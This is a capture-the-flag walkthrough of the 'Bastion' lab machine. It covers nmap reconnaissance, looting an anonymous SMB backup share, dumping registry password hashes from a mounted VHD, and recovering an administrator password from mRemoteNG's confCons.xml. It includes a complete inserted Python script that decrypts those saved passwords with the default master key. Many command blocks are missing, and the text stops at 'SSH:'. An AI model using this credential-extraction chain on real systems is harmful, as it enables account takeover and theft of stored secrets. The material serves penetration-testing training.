Bastion
Windows
Recon: NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-13T08:33:59
|_ start_date: 2024-01-13T03:25:59
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-13T09:33:57+01:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.36 seconds
OpenSSH on Windows is neat.
Enumeration: SSH Port 22/tcp
OpenSSH for_Windows_7.9 (protocol 2.0)
Enumeration: msrpc Port 135/tcp
Microsoft Windows RPC: Before checking the shares, I want to see if I can also get an anonymous session over RPC.
As a result of both services allowing anonymous access, I decided to run enum4linux to gather info on the system while I manually check the Backups share.
However, the enum4linux scan was not able to connect for some reason, so I will continue with enumerating the Backups share and then enumerate RPC manually if needed.
Enumeration: SMB Port 139/445/tcp
smbmap doesn’t give me much with a normal run, but will with a bad user name:
smbclient shows me the Backups share as well:
Backups Share: Connecting to Backups, I see two files and a directory:
Once in the share I decided to grab all the files inside (big mistake – do NOT do this – mount it instead (instructions below))
The two virtual hard disk files are HUGE and were taking a long time to download, so I decided to check the other files that downloaded already while I wait. Starting with note.exe…
A Windows Image Backup is likely to be large and the transfer will be slow (as the note warns). Rather than try to copy it over, I’m going to mount this share to my filesystem. NOTE – To mount the share rather than downloading these huge files, use the following commands:
I’ll list all the files in the share:
I see two disk image vhd files.
Mount vhd: I’m going to mount the virtual disk files and see what I can find in them. First, I’ll install guestmount with apt install libguestfs-tools, a tool for mounting virtual hard disk files on Linux.
Now, I’ll try to mount each of the two VHD files. The first one fails:
The second one works, providing access to what looks like a Windows file system root:
Shell as l4mpje
Dump Hashes From Registry: With full access to the file system, I have access to the registry files. These files can be locked when the system is running, but I won’t have that issue on a mounted drive. In the config directory where the registry hives are stored, I’ll use secretsdump.py to dump the password hashes:
I’ll also notice that secretsdump.py identified a default password (or autologon password) of “bureaulampje” for an unknown user.
Crack Hash: Submitting the NTLM hashes to crackstation returns the same password for the l4mpje account:
SSH: Seeing ssh on a Windows box is a bit unusual, but this seems like a good chance to use it. I can ssh in as l4mpje:
Privesc to administrator
In looking at the installed programs on the host, mRemoteNG jumps out as interesting:
mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:
It’s xml, with encrypted versions of the passwords stored in the file:
I solved this box right when it was released, and the above file is what it was at that time. It seems that the file has been changed since then. It doesn’t matter, the results are the same. But if you see different values from what I have, that is why. The resulting passwords will be the same.
Extract Passwords: Old Techniques
There’s a lot of articles like this and this that target an older version of the software that used a static key to decrypt the passwords. The Metasploit module abuses this as well. Starting in version 1.76, the user can now choose a master password, but there is still a default password of “mR3m”. But the default AES block mode also changed, which leaves all the older tools still incapable of decrypting newer files.
Method 1: From Within mRemoteNG
I’ll open my Commando VM and install mRemoteNG. Then I’ll drop the confCons.xml file from target into C:\Users\0xdf\AppData\Roaming\mRemoteNG and re-open mRemoteNG. I’ll see two connections listed:
mRemoteNG doesn’t want to just tell me the passwords. However, I can use the fact that the program wants to allow me to connect it to external tools that it may not be pre-programmed to work with by creating a new External Tool by going to Tools -> External Tools -> New External Tool. In the window that opens, I’ll add a display name, filename, and arguments as follows:
My external tool is just cmd, and I have it running an echo with the username and password. Now I can right-click on a connection, go to External Tools, and Password is an option:
Clicking it pops a cmd window with the password at the top:
The password for L4mpje matches what I already know. The password for DC is new:
Now I have the administrator password, “thXLHM96BeKL0ER2”.
Method 2: mremoteng-decrypt
Around the time Bastion came out, mremoteng-decrypt showed up on GitHub. At the time, there was only a java release, which I downloaded and ran here, and it worked:
I see now that there is a python script as well, though I haven’t played with it.
Method 3: Script It
At the time I was solving, there was only a java version on that GitHub, and I wanted a python version. So I wrote a quick script:
It takes a confCons.xml file, and prints all the decrypted passwords it can find.
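The decryption the script performs, as an added example in Python (my own code, not the author's script or mRemoteNG's): it walks a confCons.xml, derives the key with PBKDF2-HMAC-SHA1 from the master password and the per-entry salt, and opens each Password blob with AES-256-GCM, which is the block-mode change that breaks the older static-key tools. It needs the `cryptography` package; the sample XML is constructed, with Node names and usernames chosen to mirror the writeup, and the encrypt helper exists only to build that sample. From a defender's side, any entry that opens with “mR3m” is one still protected only by the default master password.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER = "mR3m"  # mRemoteNG's default master password (1.76+)

# A base64-decoded Password attribute is salt[16] || nonce[16] || ciphertext || GCM tag[16]; the key is
# PBKDF2-HMAC-SHA1(master, salt, KdfIterations, 32 bytes) and the cipher AES-256-GCM with no associated data.
def derive_key(master, salt, iterations):
    return hashlib.pbkdf2_hmac("sha1", master.encode(), salt, iterations, dklen=32)

def decrypt_password(blob_b64, master=DEFAULT_MASTER, iterations=1000):
    """Return the plaintext, or None when the master password fails the GCM tag check."""
    raw = base64.b64decode(blob_b64)
    if len(raw) < 48:
        raise ValueError("blob shorter than salt + nonce + tag")
    salt, nonce, body = raw[:16], raw[16:32], raw[32:]
    try:
        return AESGCM(derive_key(master, salt, iterations)).decrypt(nonce, body, None).decode()
    except InvalidTag:
        return None

def encrypt_password(plain, master=DEFAULT_MASTER, iterations=1000):
    """Write the same layout; it exists here only to construct the sample file below."""
    salt, nonce = os.urandom(16), os.urandom(16)
    ct = AESGCM(derive_key(master, salt, iterations)).encrypt(nonce, plain.encode(), None)
    return base64.b64encode(salt + nonce + ct).decode()

def extract_credentials(conf_xml, master=DEFAULT_MASTER):
    """Walk every <Node> of a confCons.xml and return (name, username, password or None) tuples."""
    root = ET.fromstring(conf_xml)
    iterations = int(root.get("KdfIterations", "1000"))  # the root records the KDF iteration count
    creds = []
    for node in root.iter("Node"):
        blob = node.get("Password", "")
        creds.append((node.get("Name"), node.get("Username"), decrypt_password(blob, master, iterations) if blob else None))
    return creds
# Constructed sample that mirrors the file's shape (root and Node attributes); not a real capture.
SAMPLE_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES"
    BlockCipherMode="GCM" KdfIterations="1000" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Password="{encrypt_password('Example-Pass-1')}" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Password="{encrypt_password('Example-Pass-2')}" />
</mrng:Connections>"""

if __name__ == "__main__":
    for name, user, password in extract_credentials(SAMPLE_XML):
        print(f"{name}: {user} / {password}")
```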
SSH: